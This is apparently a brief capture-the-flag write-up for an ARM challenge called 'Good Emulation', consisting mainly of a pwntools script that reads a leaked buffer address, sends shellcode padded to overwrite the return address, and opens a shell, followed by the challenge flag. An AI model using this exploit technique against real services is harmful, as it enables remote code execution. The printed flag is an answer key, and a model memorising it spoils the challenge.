Good Emulation

Challenge

ARM shellcode injection with leaked stack/buffer pointer.

Solution

Key solve code:

context.arch = "arm"
p = remote("localhost", 1337)
p.recvuntil(b"at ")
buf = int(p.recvlineS(), 16)

payload = asm(shellcraft.sh()).ljust(132, b"A")
p.sendline(payload + p64(buf))
p.interactive()

Flag

gigem{q3mu_wh4t_th3_fl1p}